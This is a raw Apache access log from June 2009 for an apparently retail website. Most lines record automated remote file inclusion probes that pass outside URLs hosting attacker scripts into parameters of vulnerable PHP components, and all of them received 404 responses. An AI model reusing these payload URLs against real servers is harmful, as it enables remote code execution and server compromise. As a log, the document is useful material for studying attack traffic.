71.160.22.69 - - [20/Jun/2009:00:57:22 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):osteocel" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
71.160.22.69 - - [20/Jun/2009:00:57:22 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):osteocel" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
83.98.209.71 - - [20/Jun/2009:00:57:22 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:57:22 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:00:57:22 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
71.160.22.69 - - [20/Jun/2009:00:57:25 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):osteocel" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; yie8)"
200.49.175.157 - - [20/Jun/2009:00:57:36 -0400] "GET /logs/error_log.Q109052100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:36 -0400] "GET /logs/error_log.Q109053100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:42 -0400] "GET /logs/access_log.Q109061300%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:42 -0400] "GET /logs/error_log.Q109051000%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:42 -0400] "GET /logs/access_log.Q109052100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:43 -0400] "GET /logs/error_log.Q109052100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:43 -0400] "GET /logs/error_log.Q109053100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:49 -0400] "GET /logs/access_log.Q109061300%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:49 -0400] "GET /logs/error_log.Q109051000%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:57:49 -0400] "GET /logs/access_log.Q109052100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:57:56 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:57:56 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:57:56 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:57:56 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:00:58:11 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:00:58:14 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.94.80.27 - - [20/Jun/2009:00:58:14 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?arquivo=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:00:58:15 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
200.49.175.157 - - [20/Jun/2009:00:58:39 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:58:39 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:58:45 -0400] "GET /logs/error_log.Q109061000%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:58:47 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:58:48 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:58:52 -0400] "GET /logs/error_log.Q109061000%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:58:52 -0400] "GET /logs/access_log.Q109060100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:59:01 -0400] "GET /logs/access_log.Q109060100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:59:02 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
87.230.22.39 - - [20/Jun/2009:00:59:03 -0400] "GET /logs/access_log.Q109051000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:59:17 -0400] "GET /logs/access_log.Q109060800%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:00:59:30 -0400] "GET /logs/access_log.Q109060800%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:01:01:10 -0400] "GET /logs/access_log.Q109060200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:01:01:34 -0400] "GET /logs/access_log.Q109060600/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:01:01:34 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:01:01:35 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
200.49.175.157 - - [20/Jun/2009:01:01:44 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:01:44 -0400] "GET /logs/error_log.Q109060100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jun/2009:01:01:45 -0400] "GET /logs/access_log.Q109050300//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:01:48 -0400] "GET /logs/access_log.Q109051800%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:01:48 -0400] "GET /logs/error_log.Q109060100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:01:55 -0400] "GET /logs/access_log.Q109060200/index.php?arquivo=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:01:56 -0400] "GET /logs/access_log.Q109053100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:02:02 -0400] "GET /logs/access_log.Q109053100%20%20///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:02:35 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:02:35 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:02:36 -0400] "GET /logs/access_log.Q109060300//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:01:03:50 -0400] "GET /logs/error_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:01:03:51 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
195.64.174.74 - - [20/Jun/2009:01:03:51 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
62.149.226.223 - - [20/Jun/2009:01:05:10 -0400] "GET /errors.php?error=http://www.hongik.ac.kr/ad/counts/v5id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:01:05:10 -0400] "GET /logs/errors.php?error=http://www.hongik.ac.kr/ad/counts/v5id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:01:05:10 -0400] "GET /logs/access_log.Q109060800/errors.php?error=http://www.hongik.ac.kr/ad/counts/v5id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:05:15 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:05:15 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:05:15 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.64.174.74 - - [20/Jun/2009:01:05:59 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
69.94.80.27 - - [20/Jun/2009:01:06:09 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:09 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:09 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:10 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:16 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:16 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:16 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:18 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:23 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:23 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:23 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:25 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:26 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:26 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:26 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:28 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:01:06:29 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:39 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:39 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:39 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:43 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.149.226.223 - - [20/Jun/2009:01:06:47 -0400] "GET /logs/access_log.Q109061400/errors.php?error=http://www.hongik.ac.kr/ad/counts/v5id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:48 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:48 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.80.27 - - [20/Jun/2009:01:06:51 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.kpeoplepower21.org/nalog/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:06:56 -0400] "GET /logs/error_log.Q109052400///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:06:56 -0400] "GET /logs/error_log.Q109052100///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.202.55.193 - - [20/Jun/2009:01:07:29 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
67.202.55.193 - - [20/Jun/2009:01:07:29 -0400] "GET /cgi-bin/LANSAWEB? HTTP/1.0" 408 514 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
124.138.156.3 - - [20/Jun/2009:01:07:54 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:01:07:55 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:01:07:55 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:08:05 -0400] "GET /logs/error_log.Q109052400///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:01:08:05 -0400] "GET /logs/error_log.Q109052100///vwar/backup/errors.php?error=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:01:08:10 -0400] "GET /images/items/04973401_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
195.64.174.74 - - [20/Jun/2009:01:08:36 -0400] "GET /logs/access_log.Q109052900/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jun/2009:01:08:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.138.156.3 - - [20/Jun/2009:01:09:56 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.45.16 - - [20/Jun/2009:01:10:10 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
83.98.209.71 - - [20/Jun/2009:01:10:33 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:11:18 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:11:18 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:11:20 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jun/2009:01:11:54 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mj.sc.kr/comm///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jun/2009:01:11:58 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mj.sc.kr/comm///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jun/2009:01:11:59 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mj.sc.kr/comm///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jun/2009:01:11:59 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://mj.sc.kr/comm///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:01:12:15 -0400] "GET /images/nav_store_hist_blue.jpg HTTP/1.1" 200 1474 "-" "Googlebot-Image/1.0"
83.98.209.71 - - [20/Jun/2009:01:12:32 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:01:13:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.105.207.244 - - [20/Jun/2009:01:14:13 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:15:19 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:20 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:20 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:20 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:22 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:22 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:22 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:26 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:26 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
